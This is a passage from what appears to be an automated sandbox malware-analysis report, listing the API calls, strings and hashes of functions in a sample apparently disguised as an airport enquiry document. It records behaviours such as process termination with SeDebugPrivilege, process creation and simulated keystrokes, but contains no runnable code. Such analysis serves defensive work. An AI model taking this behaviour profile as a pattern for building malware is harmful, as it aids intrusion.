            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D0F910), ref: 00CF903D
            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D0F910), ref: 00CF9071
            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CF91EB
            • SysFreeString.OLEAUT32(?), ref: 00CF9215
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Free$FileLibraryModuleNamePathQueryStringType
            • String ID:
            • API String ID: 560350794-0
            • Opcode ID: df6d0f4170718a8e4ebd35323e80c9ce520962aad82e348a6218aec5312bfdf5
            • Instruction ID: 56c4da879c4170cfc584f0d2aa87595948a917b3345430b3353a3e60b24ca66f
            • Opcode Fuzzy Hash: df6d0f4170718a8e4ebd35323e80c9ce520962aad82e348a6218aec5312bfdf5
            • Instruction Fuzzy Hash: 6EF10871A00209AFDF54DF94C888EBEB7B9FF89314F108059F616AB260DB31AE45CB51
            Function 00CFF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CFF9C9
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFB5C
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFB80
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFBC0
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFFBE2
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CFFD5E
            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CFFD90
            • CloseHandle.KERNEL32(?), ref: 00CFFDBF
            • CloseHandle.KERNEL32(?), ref: 00CFFE36
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
            • String ID:
            • API String ID: 4090791747-0
            • Opcode ID: 268b53b891b4a1ecd35cdcef1db9d9f83e9dca1b5e31207ae1eddceaebeeb535
            • Instruction ID: fdbe6c9acd7375932a254b86563dbf2aa6c4824a48f35542947ebb91795b7e5a
            • Opcode Fuzzy Hash: 268b53b891b4a1ecd35cdcef1db9d9f83e9dca1b5e31207ae1eddceaebeeb535
            • Instruction Fuzzy Hash: 7EE1B2312043459FC724EF24C891B7ABBE0EF85354F18846DF9998B2A2DB31ED46DB52
            Function 00CE4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CE38D3,?), ref: 00CE48C7
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CE38D3,?), ref: 00CE48E0
              • Part of subcall function 00CE4CD3: GetFileAttributesW.KERNEL32(?,00CE3947), ref: 00CE4CD4
            • lstrcmpiW.KERNEL32(?,?), ref: 00CE4FE2
            • _wcscmp.LIBCMT ref: 00CE4FFC
            • MoveFileW.KERNEL32(?,?), ref: 00CE5017
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
            • String ID:
            • API String ID: 793581249-0
            • Opcode ID: 26c2301d7ba1687fcf6308b9856b7709e3ac883a922ff75409fedaeab17f57fc
            • Instruction ID: aa36c96a91716bab05b44397b22d80ace04287e184811c93406c57fed9484bbc
            • Opcode Fuzzy Hash: 26c2301d7ba1687fcf6308b9856b7709e3ac883a922ff75409fedaeab17f57fc
            • Instruction Fuzzy Hash: 935175B20087859BC724EBA5CC819DFB3ECAF85344F10092EF599D3191EF74E6889766
            Function 00D088B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
            Download Yara Rule
            APIs
            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D0896E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InvalidateRect
            • String ID:
            • API String ID: 634782764-0
            • Opcode ID: cdb688926bf46cfc0564f950312cde54e16bcaacd93ea8057dcc357bd8ca7025
            • Instruction ID: 36ebdef46e37042387fa6d9e6f437c137e0b2c63c444742e917faf716322d697
            • Opcode Fuzzy Hash: cdb688926bf46cfc0564f950312cde54e16bcaacd93ea8057dcc357bd8ca7025
            • Instruction Fuzzy Hash: E4517430A00308BBDF309F28DC89BA97B65FB15324F644116F599E66E1DF71E980AB71
            Function 00C82B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
            Download Yara Rule
            APIs
            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CBC547
            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CBC569
            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CBC581
            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CBC59F
            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CBC5C0
            • DestroyIcon.USER32(00000000), ref: 00CBC5CF
            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CBC5EC
            • DestroyIcon.USER32(?), ref: 00CBC5FB
              • Part of subcall function 00D0A71E: DeleteObject.GDI32(00000000), ref: 00D0A757
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
            • String ID:
            • API String ID: 2819616528-0
            • Opcode ID: 497d6e04c8abb3f3f05fc0e9c7c3e12d800c9b4140676e560e02f1d915232045
            • Instruction ID: 48651461c52616c109365196d74b913903b972c0f050d6bf719b91b183292db3
            • Opcode Fuzzy Hash: 497d6e04c8abb3f3f05fc0e9c7c3e12d800c9b4140676e560e02f1d915232045
            • Instruction Fuzzy Hash: CD516974600309AFDB24EF25CC89FAA77B5EB54314F100528F916D76A0DB70EE90EB60
            Function 00CD9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CDAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDAE77
              • Part of subcall function 00CDAE57: GetCurrentThreadId.KERNEL32 ref: 00CDAE7E
              • Part of subcall function 00CDAE57: AttachThreadInput.USER32(00000000,?,00CD9B65,?,00000001), ref: 00CDAE85
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD9B70
            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CD9B8D
            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CD9B90
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD9B99
            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CD9BB7
            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CD9BBA
            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CD9BC3
            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CD9BDA
            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CD9BDD
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
            • String ID:
            • API String ID: 2014098862-0
            • Opcode ID: 7e01b60d51d2bf624f5fe52cbe4ad76a08a66b47487e53f43875bcc5c94fe61d
            • Instruction ID: fa6f88c3bb2ce96f10a98a020a9ddd9757990b25001cd6e8c6c984d293bbf69c
            • Opcode Fuzzy Hash: 7e01b60d51d2bf624f5fe52cbe4ad76a08a66b47487e53f43875bcc5c94fe61d
            • Instruction Fuzzy Hash: 5F11E171550718BFF6206B60DC89F6A7B2DEB4C751F610426F348AB6A0CAF35C10DAB4
            Function 00CD8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
            Download Yara Rule
            APIs
            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E0C
            • HeapAlloc.KERNEL32(00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E13
            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CD8A84,00000B00,?,?), ref: 00CD8E28
            • GetCurrentProcess.KERNEL32(?,00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E30
            • DuplicateHandle.KERNEL32(00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E33
            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CD8A84,00000B00,?,?), ref: 00CD8E43
            • GetCurrentProcess.KERNEL32(00CD8A84,00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E4B
            • DuplicateHandle.KERNEL32(00000000,?,00CD8A84,00000B00,?,?), ref: 00CD8E4E
            • CreateThread.KERNEL32(00000000,00000000,00CD8E74,00000000,00000000,00000000), ref: 00CD8E68
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
            • String ID:
            • API String ID: 1957940570-0
            • Opcode ID: 076fd47e3472884acb249f6e0c154e00182208f74203b8fcc51d1d91dd5f3b7e
            • Instruction ID: ab1666b19f8d26664efc1bb18326e43c69899fc1c198ff99b6fcca76a0928f48
            • Opcode Fuzzy Hash: 076fd47e3472884acb249f6e0c154e00182208f74203b8fcc51d1d91dd5f3b7e
            • Instruction Fuzzy Hash: BC01A8B5240308FFE620ABA5DC49F6B3BACEB89711F104425FA09DB6A1CA7098008A31
            Function 00CF9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearInit$_memset
            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
            • API String ID: 2862541840-625585964
            • Opcode ID: 9a23a248c0bdcfcb4adc18c62115c314af3682aee43daa409a67a24ce50c2d1b
            • Instruction ID: ec34e63f24e35a87fb20a2b79a56a55b24eb169d1bfb88e5e432e29560edc737
            • Opcode Fuzzy Hash: 9a23a248c0bdcfcb4adc18c62115c314af3682aee43daa409a67a24ce50c2d1b
            • Instruction Fuzzy Hash: BF91CD70A00209AFDFA4DFA5C848FAEBBB8EF45310F108119F615EB290D7709A45CFA1
            Function 00CF9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?,?,00CD799D), ref: 00CD766F
              • Part of subcall function 00CD7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD768A
              • Part of subcall function 00CD7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?,?), ref: 00CD7698
              • Part of subcall function 00CD7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CD758C,80070057,?), ref: 00CD76A8
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CF9B1B
            • _memset.LIBCMT ref: 00CF9B28
            • _memset.LIBCMT ref: 00CF9C6B
            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00CF9C97
            • CoTaskMemFree.OLE32(?), ref: 00CF9CA2
            Strings
            • NULL Pointer assignment, xrefs: 00CF9CF0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
            • String ID: NULL Pointer assignment
            • API String ID: 1300414916-2785691316
            • Opcode ID: 711747a0b567a7c3e7ce063249c3ce5d46c9d89f2df6bec5b7844feb34a3ec21
            • Instruction ID: 6b3cfc5227cf0485efa43b208e2495f480bfd2810e8a4fd43b8496fd82d0ecb0
            • Opcode Fuzzy Hash: 711747a0b567a7c3e7ce063249c3ce5d46c9d89f2df6bec5b7844feb34a3ec21
            • Instruction Fuzzy Hash: 3B914971D0021DABDF10DFA5DC84AEEBBB9EF08710F20415AF519A7281EB719A44DFA1
            Function 00D06FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D07093
            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00D070A7
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D070C1
            • _wcscat.LIBCMT ref: 00D0711C
            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D07133
            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D07161
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Window_wcscat
            • String ID: SysListView32
            • API String ID: 307300125-78025650
            • Opcode ID: 67e06a88175ed86eb216febc3b6f7d91a6dd3aaaa56056c2bf1fa61c934df0a1
            • Instruction ID: d1f5066072658be069f2b1dd23c92b3ae7069f0ba8d417bb2d18aa752faebc18
            • Opcode Fuzzy Hash: 67e06a88175ed86eb216febc3b6f7d91a6dd3aaaa56056c2bf1fa61c934df0a1
            • Instruction Fuzzy Hash: 6B418471A04308AFDB219F64CC85BEE77B8EF08354F14452AF589EB2D1D672AD858B70
            Function 00CFEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00CE3EB6
              • Part of subcall function 00CE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00CE3EC4
              • Part of subcall function 00CE3E91: CloseHandle.KERNEL32(00000000), ref: 00CE3F8E
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFECB8
            • GetLastError.KERNEL32 ref: 00CFECCB
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CFECFA
            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CFED77
            • GetLastError.KERNEL32(00000000), ref: 00CFED82
            • CloseHandle.KERNEL32(00000000), ref: 00CFEDB7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
            • String ID: SeDebugPrivilege
            • API String ID: 2533919879-2896544425
            • Opcode ID: 65932b507127ce7a73aa08723a11b00cd421a19f18b123a31755b01cd68c520b
            • Instruction ID: 863e2b796a56f0120959bbd02335b6b7f36b37ed73935caca266576faf403525
            • Opcode Fuzzy Hash: 65932b507127ce7a73aa08723a11b00cd421a19f18b123a31755b01cd68c520b
            • Instruction Fuzzy Hash: 1C41BB712002049FDB24EF24CC95F7EB7A1AF80714F18805DFA469B3D2DBB5A904EB96
            Function 00CE3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
            Download Yara Rule
            APIs
            • LoadIconW.USER32(00000000,00007F03), ref: 00CE32C5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconLoad
            • String ID: blank$info$question$stop$warning
            • API String ID: 2457776203-404129466
            • Opcode ID: 1f404e3efcea49740b96c1f86d88d98d6f1cdde7be00b0d8c0d3eb1708cbaef6
            • Instruction ID: fb83986dc3b92c4873478a4cd687f7ba118f2a04735f958078c00908b36f0538
            • Opcode Fuzzy Hash: 1f404e3efcea49740b96c1f86d88d98d6f1cdde7be00b0d8c0d3eb1708cbaef6
            • Instruction Fuzzy Hash: 2711F3317083C6BAA7015B57DC56D6AB39CDF1A364F20002AFA50AB2C2E6A5AB4045B5
            Function 00CE4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CE454E
            • LoadStringW.USER32(00000000), ref: 00CE4555
            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CE456B
            • LoadStringW.USER32(00000000), ref: 00CE4572
            • _wprintf.LIBCMT ref: 00CE4598
            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CE45B6
            Strings
            • %s (%d) : ==> %s: %s %s, xrefs: 00CE4593
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HandleLoadModuleString$Message_wprintf
            • String ID: %s (%d) : ==> %s: %s %s
            • API String ID: 3648134473-3128320259
            • Opcode ID: a164383288d7c1a0dae4594c5cd862af88f8c3f3a5f608a02f43867f1da55b06
            • Instruction ID: 4b909c224af200ac236aee112e21744b56d459ebff1ae24d04ced151b5bd6b4d
            • Opcode Fuzzy Hash: a164383288d7c1a0dae4594c5cd862af88f8c3f3a5f608a02f43867f1da55b06
            • Instruction Fuzzy Hash: C8014FF2900308BFE720E7A19D89FEB776CE708301F5005A5BB49E2151EA759E858B71
            Function 00D0D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • GetSystemMetrics.USER32(0000000F), ref: 00D0D78A
            • GetSystemMetrics.USER32(0000000F), ref: 00D0D7AA
            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00D0D9E5
            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D0DA03
            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D0DA24
            • ShowWindow.USER32(00000003,00000000), ref: 00D0DA43
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D0DA68
            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00D0DA8B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
            • String ID:
            • API String ID: 1211466189-0
            • Opcode ID: 7c7550433a597f8485e1a31a5f75299f50c38d97bbad7825d975e14e4ba484f4
            • Instruction ID: 5996f830446c0c1c0eefc19d426133eae32e5fe2c4761bac20500891db8adc8a
            • Opcode Fuzzy Hash: 7c7550433a597f8485e1a31a5f75299f50c38d97bbad7825d975e14e4ba484f4
            • Instruction Fuzzy Hash: CAB18A75600225EFDF14CFA8C9857BE7BB2FF48711F08816AEC499B295D734A950CBA0
            Function 00C82A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
            Download Yara Rule
            APIs
            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000), ref: 00C82ACF
            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00C82B17
